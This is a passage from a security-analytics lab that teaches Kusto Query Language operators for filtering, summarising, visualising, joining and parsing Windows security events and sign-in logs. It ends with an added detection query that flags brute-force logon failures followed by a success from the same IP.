| where TimeGenerated > ago(1h)
| where ProcessName != "" and Process != ""
| extend StartDir = substring(ProcessName,0, string_size(ProcessName)-string_size(Process))
```

10. The following statement demonstrates sorting results using the **order by** operator. In the Query Window, enter the following statement and select **Run**:

```KQL
SecurityEvent
| where TimeGenerated > ago(1h)
| where ProcessName != "" and Process != ""
| extend StartDir = substring(ProcessName,0, string_size(ProcessName)-string_size(Process))
| order by StartDir desc, Process asc
```

11. The following statements demonstrate specifying fields for the result set using the **project** operators.

>**Note:** You should select **Run** after entering the query from each code block below.

In the Query Window, enter the following statement and select **Run**:

```KQL
SecurityEvent
| where TimeGenerated > ago(1h)
| project Computer, Account
```

```KQL
SecurityEvent
| where TimeGenerated > ago(1h)
| where ProcessName != "" and Process != ""
| extend StartDir = substring(ProcessName,0, string_size(ProcessName)-string_size(Process))
| order by StartDir desc, Process asc
| project Process, StartDir
```

```KQL
SecurityEvent
| where TimeGenerated > ago(1h)
| where ProcessName != "" and Process != ""
| extend StartDir = substring(ProcessName,0, string_size(ProcessName)-string_size(Process))
| order by StartDir desc, Process asc
| project-away ProcessName
```


### Task 3: Analyze Results in KQL with the Summarize Operator

In this task, you will build KQL statements to prepare data.

1. The following statement demonstrates the **count()** function. In the Query Window, enter the following statement and select **Run**:

```KQL
SecurityEvent
| where TimeGenerated > ago(1h) and EventID == "4688"
| summarize count() by Process, Computer
```

2. The following statement demonstrates naming the result column of the **count()** function (`cnt=count()`). In the Query Window, enter the following statement and select **Run**:

```KQL
SecurityEvent
| where TimeGenerated > ago(1h) and EventID == 4624
| summarize cnt=count() by AccountType, Computer
```

3. The following statement demonstrates the **dcount()** function. In the Query Window, enter the following statement and select **Run**:

```KQL
SecurityEvent
| where TimeGenerated > ago(1h)
| summarize dcount(IpAddress)
```

4. The following statement is a rule to detect invalid password failures across multiple applications for the same account.
In the Query Window, enter the following statement and select **Run**:

```KQL
let timeframe = 30d;
let threshold = 1;
SigninLogs
| where TimeGenerated >= ago(timeframe)
| where ResultDescription has "Invalid password"
| summarize applicationCount = dcount(AppDisplayName) by UserPrincipalName, IPAddress
| where applicationCount >= threshold
```

5. The following statement demonstrates the **arg_max()** function.

The following statement will return the most recent row from the SecurityEvent table for the computer SQL10.na.contosohotels.com. The * in the arg_max function requests all columns for the row. In the Query Window, enter the following statement and select **Run**:

```KQL
SecurityEvent
| where Computer == "SQL10.na.contosohotels.com"
| summarize arg_max(TimeGenerated,*) by Computer
```

6. The following statement demonstrates the **arg_min()** function.

In this statement, the oldest SecurityEvent for the computer SQL10.na.contosohotels.com will be returned as the result set. In the Query Window, enter the following statement and select **Run**:

```KQL
SecurityEvent
| where Computer == "SQL10.na.contosohotels.com"
| summarize arg_min(TimeGenerated,*) by Computer
```

7. The following statements demonstrate the importance of understanding how results depend on the order of operators in the pipe "|". In the Query Window, enter the following queries and run each separately:

**Query 1** will return accounts for which the most recent activity was a login. The SecurityEvent table is first summarized to return the most recent row for each Account; then only rows with EventID equal to 4624 (login) are kept.

```KQL
SecurityEvent
| summarize arg_max(TimeGenerated, *) by Account
| where EventID == "4624"
```

**Query 2** will return the most recent login for accounts that have logged in. The SecurityEvent table is first filtered to include only EventID 4624; then these results are summarized for the most recent login row per Account.

```KQL
SecurityEvent
| where EventID == "4624"
| summarize arg_max(TimeGenerated, *) by Account
```

>**Note:** You can also review the "Total CPU" and "Data used for processed query" by selecting the **Completed** bar and compare the data between both statements.

8. The following statement demonstrates the **make_list()** function.

The make_list function returns a dynamic (JSON) array of all the values of Expression in the group. This KQL query first filters on EventID with the where operator. Next, for each Computer, the result is a JSON array of Accounts. The resulting JSON array will include duplicate accounts.

In the Query Window, enter the following statement and select **Run**:

```KQL
SecurityEvent
| where TimeGenerated > ago(1h)
| where EventID == "4624"
| summarize make_list(Account) by Computer
```

9. The following statement demonstrates the **make_set()** function.

The make_set function returns a dynamic (JSON) array containing the *distinct* values that Expression takes in the group. This KQL query first filters on EventID with the where operator. Next, for each Computer, the result is a JSON array of unique Accounts. In the Query Window.
Enter the following statement and select **Run**:

```KQL
SecurityEvent
| where TimeGenerated > ago(1h)
| where EventID == "4624"
| summarize make_set(Account) by Computer
```

### Task 4: Create visualizations in KQL with the Render Operator

In this task, you will generate visualizations with KQL statements.

1. The following statement demonstrates the **render** operator visualizing results as a bar chart. In the Query Window, enter the following statement and select **Run**:

```KQL
SecurityEvent
| where TimeGenerated > ago(1h)
| summarize count() by Account
| render barchart
```

2. The following statement demonstrates the **render** operator visualizing results as a time series.

The bin() function rounds values down to an integer multiple of the given bin size. It is used frequently in combination with summarize by .... If you have a scattered set of values, they are grouped into a smaller set of specific values. Piping the generated time series to the render operator with the timechart type produces a time series visualization. In the Query Window, enter the following statement and select **Run**:

```KQL
SecurityEvent
| where TimeGenerated > ago(1h)
| summarize count() by bin(TimeGenerated, 1m)
| render timechart
```


### Task 5: Build multi-table statements in KQL

In this task, you will build multi-table KQL statements.

1. The following statements demonstrate the **union** operator, which takes two or more tables and returns the rows of all of them. Understanding how results are passed along and affected by the pipe character is essential. In the Query Window, enter the following statements and select **Run** for each separately to see the results:

**Query 1** will return all rows of SecurityEvent and all rows of SigninLogs.

```KQL
SecurityEvent
| union SigninLogs
```

**Query 2** will return one row and one column: the count of all rows of SecurityEvent plus all rows of SigninLogs.

```KQL
SecurityEvent
| union SigninLogs
| summarize count()
```

**Query 3** will return all rows of SecurityEvent and one row for SigninLogs. The row for SigninLogs will hold the count of the SigninLogs rows.

```KQL
SecurityEvent
| union (SigninLogs | summarize count() | project count_)
```

2. The following statement demonstrates the union operator's support for wildcards to union multiple tables. In the Query Window, enter the following statement and select **Run**:

```KQL
union Security*
| summarize count() by Type
```

3. The following statement demonstrates the **join** operator, which merges the rows of two tables to form a new table by matching the values of the specified columns from each table. In the Query Window, enter the following statement and select **Run**:

```KQL
SecurityEvent
| where EventID == "4624"
| summarize LogOnCount=count() by EventID, Account
| project LogOnCount, Account
| join kind = inner (
    SecurityEvent
    | where EventID == "4634"
    | summarize LogOffCount=count() by EventID, Account
    | project LogOffCount, Account
) on Account
```

The first table specified in the join is considered the left table. The table after the join keyword is the right table. When working with columns from the two tables, the `$left.ColumnName` and `$right.ColumnName` prefixes distinguish which table's column is referenced.


### Task 6: Work with string data in KQL

In this task, you will work with structured and unstructured string fields with KQL statements.

1. The following statement demonstrates the **extract()** function. Extract gets a match for a regular expression from a text string. You have the option to convert the extracted substring to the indicated type. In the Query Window, enter the following statement and select **Run**:

```KQL
print extract("x=([0-9.]+)", 1, "hello x=45.6|wo") == "45.6"
```

2. The following statement uses the extract() function to pull out the account name from the Account field of the SecurityEvent table. In the Query Window, enter the following statement and select **Run**:

```KQL
SecurityEvent
| where EventID == 4672 and AccountType == 'User'
| extend Account_Name = extract(@"^(.*\\)?([^@]*)(@.*)?$", 2, tolower(Account))
| summarize LoginCount = count() by Account_Name
| where Account_Name != ""
| where LoginCount < 10
```

3. The following statement demonstrates the **parse** operator. Parse evaluates a string expression and parses its value into one or more calculated columns. The computed columns will have nulls for unsuccessfully parsed strings.

```KQL
let Traces = datatable(EventText:string)
[
"Event: NotifySliceRelease (resourceName=PipelineScheduler, totalSlices=27, sliceNumber=23, lockTime=02/17/2016 08:40:01, releaseTime=02/17/2016 08:40:01, previousLockTime=02/17/2016 08:39:01)",
"Event: NotifySliceRelease (resourceName=PipelineScheduler, totalSlices=27, sliceNumber=15, lockTime=02/17/2016 08:40:00, releaseTime=02/17/2016 08:40:00, previousLockTime=02/17/2016 08:39:00)",
"Event: NotifySliceRelease (resourceName=PipelineScheduler, totalSlices=27, sliceNumber=20, lockTime=02/17/2016 08:40:01, releaseTime=02/17/2016 08:40:01, previousLockTime=02/17/2016 08:39:01)",
"Event: NotifySliceRelease (resourceName=PipelineScheduler, totalSlices=27, sliceNumber=22, lockTime=02/17/2016 08:41:01, releaseTime=02/17/2016 08:41:00, previousLockTime=02/17/2016 08:40:01)",
"Event: NotifySliceRelease (resourceName=PipelineScheduler, totalSlices=27, sliceNumber=16, lockTime=02/17/2016 08:41:00, releaseTime=02/17/2016 08:41:00, previousLockTime=02/17/2016 08:40:00)"
];
Traces
| parse EventText with * "resourceName=" resourceName ", totalSlices=" totalSlices:long * "sliceNumber=" sliceNumber:long * "lockTime=" lockTime ", releaseTime=" releaseTime:date "," * "previousLockTime=" previousLockTime:date ")" *
| project resourceName, totalSlices, sliceNumber, lockTime, releaseTime, previousLockTime
```

4. The following statement demonstrates working with dynamic fields, which are special in that they can hold values of any other data type. In this example, the DeviceDetail field of the SigninLogs table is of type dynamic. In the Query Window, enter the following statement and select **Run**:

```KQL
SigninLogs
| extend OS = DeviceDetail.operatingSystem
```

5. The following example shows how to break out packed fields for SigninLogs. In the Query Window, enter the following statement and select **Run**:

```KQL
SigninLogs
| extend OS = DeviceDetail.operatingSystem, Browser = DeviceDetail.browser
| extend StatusCode = tostring(Status.errorCode), StatusDetails = tostring(Status.additionalDetails)
| extend Date = startofday(TimeGenerated)
| summarize count() by Date, Identity, UserDisplayName, UserPrincipalName, IPAddress, ResultType, ResultDescription, StatusCode, StatusDetails, ConditionalAccessPol0Name, ConditionalAccessPol0Result, ConditionalAccessPol1Name, ConditionalAccessPol1Result, ConditionalAccessPol2Name, ConditionalAccessPol2Result, Location, State, City
| sort by Date
```

6. The following statements demonstrate operators for manipulating JSON stored in string fields. Many logs submit data in JSON format, so you need to know how to transform JSON data into queryable fields.

In the Query Window, enter the following statements individually and select **Run**:

```KQL
SigninLogs
| extend AuthDetails = todynamic(AuthenticationDetails)
| extend AuthMethod = AuthDetails[0].authenticationMethod
| extend AuthResult = AuthDetails[0]["authenticationStepResultDetail"]
| project AuthMethod, AuthResult, AuthDetails
```

The mv-expand operator expands multi-value dynamic arrays or property bags into multiple records.

```KQL
SigninLogs
| mv-expand AuthDetails = todynamic(AuthenticationDetails)
| project AuthDetails
```

The mv-apply operator applies a subquery to each record and returns the union of the results of all subqueries.

```KQL
SigninLogs
| mv-apply AuthDetails = todynamic(AuthenticationDetails) on
    (where AuthDetails.authenticationMethod == "Password")
```

7. To create a function:

>**Note:** You will not be able to do this in the lademo environment used for data in this lab, but it's an important concept to use in your own environment.

After running a query, select the **Save** button and then select **Save as function** from the drop-down. Enter the name you want, for example *PrivLogins*, in the **Function name** box, enter a **Legacy category** such as *General*, and select **Save**.

The function will then be available in KQL by its alias:

```KQL
PrivLogins
```

## You have completed the lab.
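Added capstone example, not part of the original lab: the operators practised in Task 2 (let, where, extend), Task 3 (summarize with count, min, max and make_set), Task 5 (join) and Task 6 (extract) combined into one detection over the same SecurityEvent table. It flags an account that saw at least `failureThreshold` failed logons (EventID 4625) from one source IP and then a successful network or RDP logon (EventID 4624, LogonType 3 or 10) from that same IP within `successWindow` of the last failure, which is the pattern a password-spray or brute-force attempt leaves behind when it finally works. The column names are the ones this lab already uses; the thresholds, the excluded local addresses and the LogonType filter are illustrative assumptions to tune for your own environment.

```kql
// Added example, not part of the original lab: brute-force-then-success detection.
// Assumptions: SecurityEvent columns as used in this lab (TimeGenerated, EventID, Account,
// IpAddress, Computer, LogonType); thresholds and filters below are illustrative.
let lookback = 24h;
let failureThreshold = 10;      // failed logons from one IP against one account before we care
let successWindow = 1h;         // how soon after the last failure a success counts as suspicious
// Normalise DOMAIN\user and user@domain to a bare account name (same regex as Task 6, step 2).
let accountName = (acct: string) { tolower(extract(@"^(.*\\)?([^@]*)(@.*)?$", 2, acct)) };
let failures =
    SecurityEvent
    | where TimeGenerated > ago(lookback)
    | where EventID == 4625                                    // failed logon
    | where isnotempty(IpAddress) and IpAddress !in ("-", "::1", "127.0.0.1")
    | extend AccountName = accountName(Account)
    | where isnotempty(AccountName)
    | summarize
        FailureCount    = count(),
        FirstFailure    = min(TimeGenerated),
        LastFailure     = max(TimeGenerated),
        TargetComputers = make_set(Computer, 10)               // distinct targets, capped at 10
      by AccountName, IpAddress
    | where FailureCount >= failureThreshold;
let successes =
    SecurityEvent
    | where TimeGenerated > ago(lookback)
    | where EventID == 4624                                    // successful logon
    | where LogonType in (3, 10)                               // network / RDP: source IP is meaningful
    | extend AccountName = accountName(Account)
    | project SuccessTime = TimeGenerated, AccountName, IpAddress, SuccessComputer = Computer;
failures
| join kind=inner successes on AccountName, IpAddress          // same account AND same source IP
| where SuccessTime between (LastFailure .. (LastFailure + successWindow))
| project AccountName, IpAddress, FailureCount, FirstFailure, LastFailure,
          SuccessTime, SuccessComputer, TargetComputers
| order by FailureCount desc
```

Note the operator order, as in Task 3 step 7: each side is filtered and summarized before the join so that the join works on one row per account and IP rather than on raw events, and the time-window check runs after the join because it needs columns from both sides. If the query returns nothing in the lademo workspace, lower `failureThreshold` or widen `successWindow` to see the join produce rows, then restore them before turning the query into an analytics rule.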